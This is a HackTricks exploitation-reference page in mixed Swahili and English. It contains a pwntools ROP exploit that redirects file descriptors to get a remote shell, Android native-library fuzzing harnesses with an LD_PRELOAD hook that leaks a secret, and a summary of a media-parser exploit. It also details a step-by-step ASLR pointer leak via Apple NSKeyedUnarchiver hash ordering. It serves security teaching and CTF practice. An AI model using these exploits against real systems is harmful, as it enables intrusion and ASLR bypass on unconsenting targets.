Matatizo ya kawaida ya Exploiting

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

FDs in Remote Exploitation

When sending an exploit to a remote server that calls system('/bin/sh') for example, this will be executed in the server process ofc, and /bin/sh will expect input from stdin (FD: 0) and will print the output in stdout and stderr (FDs 1 and 2). So the attacker won’t be able to interact with the shell.

A way to fix this is to suppose that when the server started it created the FD number 3 (for listening) and that then, your connection is going to be in the FD number 4. Therefore, it’s possible to use the syscall dup2 to duplicate the stdin (FD 0) and the stdout (FD 1) in the FD 4 (the one of the connection of the attacker) so it’ll make feasible to contact the shell once it’s executed.

Exploit example from here:

from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()

Socat & pty

Kumbuka kuwa socat tayari huhamisha stdin na stdout kwa socket. Hata hivyo, mode ya pty inaingiza DELETE characters. Kwa hivyo, ikiwa utatuma \x7f (DELETE) itafuta character iliyotangulia ya exploit yako.

Ili kuzunguka hili, character ya escape \x16 lazima iwe imewekwa mbele ya kila \x7f inayotumwa.

Hapa unaweza find an example of this behaviour.

Android AArch64 shared-library fuzzing & LD_PRELOAD hooking

Wakati app ya Android inapotoka tu na .so ya AArch64 iliyokatwa (stripped), bado unaweza fuzz exported logic moja kwa moja kwenye kifaa bila kujenga APK tena. Mfuatano wa vitendo:

  1. Locate callable entry points. objdump -T libvalidate.so | grep -E "validate" inaorodhesha kwa haraka exported functions. Decompilers (Ghidra, IDA, BN) zinaonyesha signature halisi, kwa mfano int validate(const uint8_t *buf, uint64_t len).
  2. Write a standalone harness. Pakia faili, uhifadhi buffer iwe hai, na uitaje exported symbol kwa usahihi kama app ingefanya. Cross-compile na NDK (mfano aarch64-linux-android21-clang harness.c -L. -lvalidate -fPIE -pie).
Minimal file-driven harness ```c #include #include #include #include #include #include

extern int validate(const uint8_t *buf, uint64_t len);

int main(int argc, char **argv) { if (argc < 2) return 1; int fd = open(argv[1], O_RDONLY); if (fd < 0) return 1; struct stat st = {0}; if (fstat(fd, &st) < 0) return 1; uint8_t *buffer = malloc(st.st_size + 1); read(fd, buffer, st.st_size); close(fd); int ret = validate(buffer, st.st_size); free(buffer); return ret; }

</details>

3. **Jenga upya muundo uliotarajiwa.** Mifano ya ujumbe wa hitilafu na kulinganisha katika Ghidra yalionyesha kuwa kazi ilichambua JSON kali yenye funguo za kudumu (`magic`, `version`, nested `root.children.*`) na ukaguzi wa kihesabu (kwa mfano, `value * 2 == 84` ⇒ `value` lazima iwe `42`). Kutoa JSON iliyo sahihi kimsingi inayokidhi kwa taratibu kila tawi kunakuwezesha kuchora ramani ya schema bila instrumentation.
4. **Vuka anti-debug ili leak siri.** Kwa sababu `.so` inaimport `snprintf`, ibadili kwa `LD_PRELOAD` ili dump sensitive format strings hata wakati breakpoints zimezuiwa:

<details>
<summary>Mfupi snprintf leak hook</summary>
```c
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

typedef int (*vsnprintf_t)(char *, size_t, const char *, va_list);

int snprintf(char *str, size_t size, const char *fmt, ...) {
static vsnprintf_t real_vsnprintf;
if (!real_vsnprintf)
real_vsnprintf = (vsnprintf_t)dlsym(RTLD_NEXT, "vsnprintf");

va_list args;
va_start(args, fmt);
va_list args_copy;
va_copy(args_copy, args);
if (fmt && strstr(fmt, "MHL{")) {
fprintf(stdout, "[LD_PRELOAD] flag: ");
vfprintf(stdout, fmt, args);
fputc('\n', stdout);
}
int ret = real_vsnprintf(str, size, fmt, args_copy);
va_end(args_copy);
va_end(args);
return ret;
}

LD_PRELOAD=./hook.so ./validate_harness payload.json exfiltrates the internal flag and confirms the crash oracle without patching the binary. 5. Punguza fuzz space. Disassembly ilifichua XOR key iliyotumika tena katika flag comparison, ikimaanisha the first seven bytes of flag zilijulikana. Fuzz tu the nine unknown bytes. 6. Weka fuzz bytes ndani ya valid JSON envelope. The AFL harness reads exactly nine bytes from stdin, copies them into the flag suffix, and hard-codes every other field (constants, tree depths, arithmetic preimage). Any malformed read simply exits, so AFL spends cycles on meaningful testcases:

Minimal AFL harness ```c #include #include #include #include

extern int validate(unsigned char *bytes, size_t len);

#define FUZZ_SIZE 9

int main(void) { uint8_t blob[FUZZ_SIZE]; if (read(STDIN_FILENO, blob, FUZZ_SIZE) != FUZZ_SIZE) return 0; char suffix[FUZZ_SIZE + 1]; memcpy(suffix, blob, FUZZ_SIZE); suffix[FUZZ_SIZE] = ‘\0’; char json[512]; int len = snprintf(json, sizeof(json), “{"magic":16909060,"version":1,"padding":0,"flag":"MHL{827b07c%s}",”
“"root":{"type":16,"level":3,"num_children":1,"children":[”
“{"type":32,"level":2,"num_children":1,"subchildren":[”
“{"type":48,"level":1,"num_children":1,"leaves":[”
“{"type":64,"level":0,"reserved":0,"value":42}]}}]}}”, suffix); if (len <= 0 || (size_t)len >= sizeof(json)) return 0; validate((unsigned char *)json, len); return 0; }

</details>

7. **Run AFL with the crash-as-success oracle.** Kila input inayokidhi kila ukaguzi wa semantiki na kubahatisha suffix sahihi ya byte tisa itasababisha deliberate crash; hizo faili zinaenda katika `output/crashes` na zinaweza kurekebishwa kupitia harness rahisi ili kurecover secret.

Mtiririko huu unakuwezesha kuainisha kwa haraka validators za anti-debug-protected JNI, leak secrets unapohitajika, kisha fuzz bytes zinazomaanisha pekee, yote bila kugusa APK asilia.

## Image/Media Parsing Exploits (DNG/TIFF/JPEG)

Malicious camera formats mara nyingi huleta bytecode zao wenyewe (opcode lists, map tables, tone curves). Wakati decoder mwenye vigezo vya juu ukishindwa kufanya bound-check ya dimensions zilizoondolewa kutoka metadata au plane indices, yale opcodes yanageuka kuwa attacker-controlled read/write primitives ambazo zinaweza kupamba heap, kupindua pointers, au hata leak ASLR. Samsung's in-the-wild Quram exploit ni mfano wa karibuni wa kuunganisha `DeltaPerColumn` bounds bug, heap spraying kupitia skipped opcodes, vtable remapping, na mnyororo wa JOP hadi `system()`.

<a class="content_ref" href="../mobile-pentesting/android-app-pentesting/abusing-android-media-pipelines-image-parsers.md"><span class="content_ref_label">Abusing Android Media Pipelines Image Parsers</span></a>

## Pointer-Keyed Hash Table Pointer Leaks on Apple Serialization

### Requirements & attack surface

- A service inakubali attacker-controlled property lists (XML au binary) na inaita `NSKeyedUnarchiver.unarchivedObjectOfClasses` na allowlist iliyo permissive (mfano, `NSDictionary`, `NSArray`, `NSNumber`, `NSString`, `NSNull`).
- Vitu vinavyotokana vinatumika tena kisha serialized tena na `NSKeyedArchiver` (au iterated kwa deterministic bucket order) na kutumwa nyuma kwa attacker.
- Aina fulani ya key ndani ya containers inatumia pointer values kama hash code yake. Kabla ya March 2025, `CFNull`/`NSNull` ilirudi kwa `CFHash(object) == (uintptr_t)object`, na deserialization ilirudisha kila wakati shared-cache singleton `kCFNull`, ikitoa pointer imara iliyoshirikiwa na kernel bila memory corruption au timing.

### Controllable hashing primitives

- **Pointer-based hashing:** `CFNull`’s `CFRuntimeClass` haikuwahi kuwa na hash callback, hivyo `CFBasicHash` hutumia address ya object kama hash. Kwa sababu singleton inaishi katika shared-cache address iliyowekwa hadi reboot, hash yake ni imara across processes.
- **Attacker-controlled hashes:** 32-bit `NSNumber` keys zinalindwa kupitia `_CFHashInt`, ambayo ni deterministic na attacker-controllable. Kuchagua integers maalum kunamruhusu mshambuliaji kuchagua `hash(number) % num_buckets` kwa ukubwa wowote wa table.
- **`NSDictionary` implementation:** Immutable dictionaries zina embed `CFBasicHash` na idadi ya prime buckets inachaguliwa kutoka `__CFBasicHashTableSizes` (mfano, 23, 41, 71, 127, 191, 251, 383, 631, 1087). Collisions zinashughulikiwa kwa linear probing (`__kCFBasicHashLinearHashingValue`), na serialization inatembea buckets kwa mpangilio wa nambari; kwa hivyo, mpangilio wa keys zilizotoshwa unaweka code ya bucket index ambayo kila key hatimaye ilikaa.

### Encoding bucket indices into serialization order

Kwa kutengeneza plist inayofanya dictionary ambamo buckets zinabadilika kati ya vilivyokaa na slots tupu, mshambuliaji anabana wapi linear probing inaweza kuweka `NSNull`. Kwa mfano wa buckets 7, kujaza buckets zenye nambari mbili (even) na `NSNumber` keys kunatoa:
```text
bucket:          0 1 2 3 4 5 6
occupancy:       # _ # _ # _ #

Wakati wa deserialization mwathiriwa anaingiza key moja NSNull. Bucket yake ya awali ni hash(NSNull) % 7, lakini probing inaendelea hadi ifike kwenye mojawapo ya indices wazi {1,3,5}. Mpangilio wa keys ulioserializa unaonyesha ni slot gani ilitumika, ukifichua ikiwa pointer hash modulo 7 iko katika {6,0,1}, {2,3}, au {4,5}. Kwa kuwa attacker anadhibiti mpangilio wa asili ulioserializa, key NSNull inatolewa mwisho kwenye input plist ili mpangilio baada ya deserialization uwe kazi ya placement ya bucket pekee.

Kutatua masalia kamili kwa meza zinazokamiliana

Kamusi moja tu leaks anuwai ya masalia. Ili kubaini thamani kamili ya hash(NSNull) % p, tengeneza kamusi mbili kwa kila prime bucket size p: moja na even buckets zimejazwa awali na moja na odd buckets zimejazwa awali. Kwa pattern inayokamiliana (_ # _ # _ # _), slots zisizojazwa (0,2,4,6) zinaelekezwa kwenye seti za masalia {0}, {1,2}, {3,4}, {5,6}. Kuangalia nafasi ya NSNull iliyoserializa katika kamusi zote mbili kunapunguza masalia hadi thamani moja kwa sababu ukingo (intersection) wa seti mbili za wagombea unatoa r_i pekee kwa p hiyo.

Attacker anaweka kamusi zote ndani ya NSArray, hivyo mzunguko mmoja wa deserialize → serialize unaleaks masalia kwa kila table size iliyochaguliwa.

Kujenga upya pointer ya shared-cache ya 64-bit

Kwa kila prime p_i ∈ {23, 41, 71, 127, 191, 251, 383, 631, 1087}, attacker anapata tena hash(NSNull) ≡ r_i (mod p_i) kutoka kwa mpangilio ulioserializa. Kutumia Chinese Remainder Theorem (CRT) pamoja na extended Euclidean algorithm kunatoa:

Π p_i = 23·41·71·127·191·251·383·631·1087 = 0x5ce23017b3bd51495 > 2^64

hivyo residue iliyojumlishwa kwa pamoja inalingana kwa kipekee na pointer ya 64-bit kwa kCFNull. Project Zero PoC huunganisha milinganyo kwa mfululizo wakati ikichapisha moduli za kati ili kuonyesha muunganisho kuelekea anwani halisi (0x00000001eb91ab60 on the vulnerable build).

Mtiririko wa vitendo

  1. Generate crafted input: Jenga attacker-side XML plist (kamusi mbili kwa kila prime, NSNull serialized last) na uibadilishe kuwa binary format.
clang -o attacker-input-generator attacker-input-generator.c
./attacker-input-generator > attacker-input.plist
plutil -convert binary1 attacker-input.plist
  1. Victim round trip: Huduma ya victim inafanya deserialization kwa NSKeyedUnarchiver.unarchivedObjectOfClasses kwa kutumia seti ya classes zilizoruhusiwa {NSDictionary, NSArray, NSNumber, NSString, NSNull} na mara moja inafanya re-serialization kwa NSKeyedArchiver.
  2. Residue extraction: Kubadilisha plist iliyorejeshwa kurudi XML kunaonyesha upangaji wa funguo za kamusi. Msaidizi kama extract-pointer.c husoma object table, huamua index ya singleton NSNull, hunakili kila jozi ya kamusi kurudi kwa bucket residue yake, na hutatua mfumo wa CRT ili kupata pointer ya shared-cache.
  3. Verification (optional): Kukusanya helper mdogo wa Objective-C unaochapisha CFHash(kCFNull) kunathibitisha the leaked value inafanana na anwani halisi.

Hakuna hitilafu ya memory safety inayohitajika—kuangalia tu mpangilio wa serialization wa pointer-keyed structures kunatoa primitive ya remote ASLR bypass.

Kurasa zinazohusiana

Common Exploiting Problems Unsafe Relocation Fixups

Reversing Native Libraries

Reversing Tools & Basic Methods

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks